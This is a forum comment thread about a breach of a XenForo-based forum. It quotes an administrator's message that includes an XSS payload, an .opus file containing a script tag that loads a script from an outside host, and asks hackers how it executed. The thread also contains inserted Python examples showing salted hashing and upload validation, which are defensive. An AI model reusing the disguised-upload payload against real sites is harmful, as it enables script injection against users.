
[–][deleted]  (6 children)

[deleted]

    [–][deleted] 1 insightful - 2 fun (5 children)

    I don't recall reading anything about the password situation besides he didn't think they'd been compromised but it was best to be safe rather than sorry. Apparently the forum software Xenforo does salt and hash passwords, but I've read a technique called rainbow tables can be used to glean the password anyways.

    Or he might have modified the code, or it was an obsolete version. Apparently their license for that software has not been renewed for some time because of the content of the site and things are out of date.

    [–][deleted] 2 insightful - 2 fun (4 children)

    Apparently the forum software Xenforo does salt and hash passwords, but I've read a technique called rainbow tables can be used to glean the password anyways.

    Rainbow table attacks can break 1-way hashing alone, but salting should prevent this

    [–][deleted] 1 insightful - 2 fun (3 children)

    Interesting. The attacker was able to gain admin access and had free roam of the system for a bit. I imagine this means the salt was compromised and then the rainbow table attack could still work, just take a bit longer.

    The site was compromised through his custom chat code, made me think of you actually. The attacker was able to upload a .. fuck, forgot the extension but some audio format file I think (.opus?), and XenForo doesn't verify data. It wasn't audio but a script and somehow it was able to be executed even though it shouldn't have had the permissions. I can look for the Telegram message if you're interested. That got them admin, they tried to get the user data, but it was too big and crashed the system (lol), so instead they just deleted everything.
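The exchange above turns on two claims: that salting defeats a precomputed (rainbow) table, and that a leaked salt lets the table attack "still work, just take a bit longer". The following added example (my code, not anything from the thread or from XenForo) makes both concrete with a constructed five-word wordlist standing in for the attacker's table: a table built once recovers an unsalted SHA-256 digest by lookup, the same table is useless against a per-user random salt, and once the salt is known the attacker still has to run the slow KDF once per guess per user, with no precomputation to reuse. PBKDF2-HMAC-SHA256 from the standard library is used as the slow hash; the iteration count is an assumption chosen to keep the demo fast.

```python
import hashlib
import secrets
from typing import Optional, Tuple

# Constructed toy wordlist standing in for an attacker's precomputed table.
# A real rainbow table covers billions of candidates; the principle is identical.
WORDLIST = ["password", "letmein", "hunter2", "qwerty", "kiwi1234"]
KDF_ITERATIONS = 100_000  # assumption for the demo; production values are tuned per server


def unsalted_hash(password: str) -> str:
    """Plain SHA-256: every site produces the same digest for the same password,
    so one table built in advance recovers it everywhere."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_rainbow_table(words) -> dict:
    """Precompute digest -> password once. This is the work a table amortises
    across every victim hash it is ever applied to."""
    return {unsalted_hash(w): w for w in words}


def lookup_in_table(table: dict, digest: str) -> Optional[str]:
    """Table attack at hash time is a single lookup; no hashing is performed."""
    return table.get(digest)


def salted_hash(password: str, salt: bytes, iterations: int = KDF_ITERATIONS) -> bytes:
    """Per-user random salt plus a deliberately slow KDF."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def make_record(password: str) -> Tuple[bytes, bytes]:
    """What the database stores for one user: (salt, digest)."""
    salt = secrets.token_bytes(16)
    return salt, salted_hash(password, salt)


def verify(password: str, salt: bytes, stored: bytes) -> bool:
    return secrets.compare_digest(salted_hash(password, salt), stored)


def per_user_guessing(salt: bytes, stored: bytes, words) -> Tuple[Optional[str], int]:
    """The attacker's situation after the salt leaks: every candidate costs one
    full KDF run for this one user, and nothing computed before the breach helps.
    Returns (recovered password or None, number of KDF evaluations spent)."""
    for spent, candidate in enumerate(words, start=1):
        if verify(candidate, salt, stored):
            return candidate, spent
    return None, len(words)


if __name__ == "__main__":
    table = build_rainbow_table(WORDLIST)
    print("unsalted lookup:", lookup_in_table(table, unsalted_hash("hunter2")))
    salt, stored = make_record("hunter2")
    print("salted lookup:  ", lookup_in_table(table, stored.hex()))
    print("with salt known:", per_user_guessing(salt, stored, WORDLIST))
```

The last line of output is the point of the thread's second claim: knowing the salt turns the problem back into per-user guessing at KDF speed, not into a table lookup, and two users with the same password still get different digests because each has a fresh salt.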

    [–][deleted] 2 insightful - 2 fun (2 children)

    Deleted everything? Damn, I hope they had backups. Yeah, definitely curious as to what exactly happened here if you come across the info.

    [–][deleted] 2 insightful - 2 fun (1 child)

    It was all backed up. This is from the Telegram: (link)

    The issue was a script injection. I am working on the details. Here is my challenge to any hackers or aspiring hackers.

    There is a file called troonshine.opus, with the contents of this:
    <!DOCTYPE html>
    <script src=//poz.hiv/load.js></script>

    The web document, on the same domain, has a CORS rule that looks like this:
    <meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-0113ffa9cf5af884e070dd1e36188e5db5ba4bbdacaef1c21a733cea089a7fce'" />

    What could you possibly put into that document to get it to load the .opus and have the script execute?

    The finer details are this: XenForo does not validate any file contents. You can write an .opus file that is basically just an HTML document loading a script off-site and if you somehow open it, it does run. I have confirmed this.

    The question is of how it got injected. The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on. Relevant source:
    https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs
    https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js
    https://github.com/jaw-sh/ruforo/tree/master/src/bbcode

    What baffles me is that even if we did theoretically pass the client a message that was simply instruction to load another script, it should not work, because the security policy of the chat explicitly says that no scripts should run — EVEN FROM THE SAME DOMAIN — unless they are given a nonce token. I know it happened in the chat, though, because I found the access.log entry where it gets opened:
    x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/3696/3696202-c63cc36fd4acb874fdebd0b3988c3410.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"

    So what can be done to make an .opus media file load as an inline web document which can execute its own scripts that violate the CORS of the web document it's loaded into? I just don't understand.

    jcmoon@pm.me
    P.S. If you're going to write me and take credit for the attack, include the name of the random user you made an admin.

    Edit: I believe that the .opus file with the XSS payload was injected via an iframe that was somehow added to chat. I don't know how they rendered an iframe but that would work.
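Two defensive gaps are visible in the message above: the upload's contents were never checked, and the file, once fetched from /data/audio/, was served as a document of its own. The meta CSP on the chat page governs only the chat document; any file a browser navigates to or frames is a separate document carrying whatever policy its own response has, which for a static upload is typically none. The added example below (my code, not XenForo's, ruforo's, or anything from the thread) shows the two checks an upload pipeline would want: a surface check that a claimed .opus file really begins with an Ogg page whose first packet is an Opus identification header, a tripwire for markup disguised as audio, and the response headers that stop a browser from rendering an upload as a page even if validation were bypassed. The Ogg/Opus sample bytes and the HTML-as-opus sample are constructed here; the remote host in the HTML sample is a placeholder.

```python
import re
import struct

OGG_MAGIC = b"OggS"
OGG_HEADER_LEN = 27          # fixed part of an Ogg page header, before the segment table
OPUS_ID_MAGIC = b"OpusHead"  # first packet of an Opus stream is the identification header


def is_ogg_opus(data: bytes) -> bool:
    """Surface check only: the bytes must start with an Ogg page (version 0) whose
    payload begins with OpusHead. The page CRC is not verified and nothing is
    decoded; this refuses files that are not even Ogg/Opus on the surface."""
    if len(data) < OGG_HEADER_LEN + 1 or data[:4] != OGG_MAGIC:
        return False
    if data[4] != 0:  # Ogg stream structure version
        return False
    num_segments = data[26]
    payload = data[OGG_HEADER_LEN + num_segments:]
    return payload.startswith(OPUS_ID_MAGIC)


def looks_like_markup(data: bytes) -> bool:
    """Tripwire for the trick in the message: text a browser would render as HTML."""
    head = data.lstrip()[:64].lower()
    return head.startswith(b"<!doctype") or head.startswith(b"<html") or b"<script" in head


def validate_upload(data: bytes) -> str:
    """Decision for a file uploaded as .opus."""
    if looks_like_markup(data):
        return "reject: markup disguised as audio"
    if not is_ogg_opus(data):
        return "reject: not an Ogg/Opus stream"
    return "accept"


def safe_filename(name: str) -> str:
    """Keep only characters that cannot break the Content-Disposition header."""
    return re.sub(r"[^A-Za-z0-9._-]", "_", name)[:100] or "upload"


def upload_response_headers(filename: str) -> dict:
    """Headers for serving a user upload so that the browser has no licence to
    treat it as a page: fixed media type, no sniffing, download rather than
    display, and a header-delivered CSP (meta CSP cannot express 'sandbox')
    that would make a rendered upload an opaque-origin document with no scripts."""
    return {
        "Content-Type": "audio/ogg",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="%s"' % safe_filename(filename),
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def constructed_ogg_opus() -> bytes:
    """Constructed minimal first Ogg page carrying an OpusHead packet (CRC left zero)."""
    opus_head = (OPUS_ID_MAGIC
                 + bytes([1])                 # version
                 + bytes([2])                 # channel count
                 + struct.pack("<H", 312)     # pre-skip
                 + struct.pack("<I", 48000)   # input sample rate
                 + struct.pack("<h", 0)       # output gain
                 + bytes([0]))                # channel mapping family
    page_header = (OGG_MAGIC + b"\x00" + b"\x02"   # version 0, beginning-of-stream flag
                   + struct.pack("<q", 0)          # granule position
                   + struct.pack("<I", 0x1234)     # stream serial (constructed)
                   + struct.pack("<I", 0)          # page sequence number
                   + struct.pack("<I", 0)          # CRC, not verified by is_ogg_opus
                   + bytes([1]) + bytes([len(opus_head)]))  # one segment
    return page_header + opus_head


# Constructed stand-in for the file described in the message; host is a placeholder.
HTML_DISGUISED_AS_OPUS = b"<!DOCTYPE html>\n<script src=//attacker.example/load.js></script>\n"

if __name__ == "__main__":
    print(validate_upload(constructed_ogg_opus()))
    print(validate_upload(HTML_DISGUISED_AS_OPUS))
    print(upload_response_headers("3696202-example.opus"))
```

The magic-byte check is a floor, not a ceiling: a pipeline that can afford it should transcode uploads with a real decoder, and uploads are best served from a separate origin so that even a rendered file cannot carry the forum's cookies or session.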

    [–][deleted] 3 insightful - 2 fun (0 children)

    The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on

    Yikes, lol, I see why this reminded you of me. Hacking his rusty forum and chat hits a little close to home

    So the good news is it doesn't sound like a rainbow table attack was able to break hashed and salted passwords. That would be catastrophic for security. An XSS attack is a more sensible attack vector for something like this. I am no hacker or security expert, but if there was a problem with his code, or even an underlying library that could be exploited, it would explain this. In the server I'm working on, I use the actix-cors library and if anyone can exploit that library I'd be boned, my code depends on all those library implementations being correct even if I do everything right on my end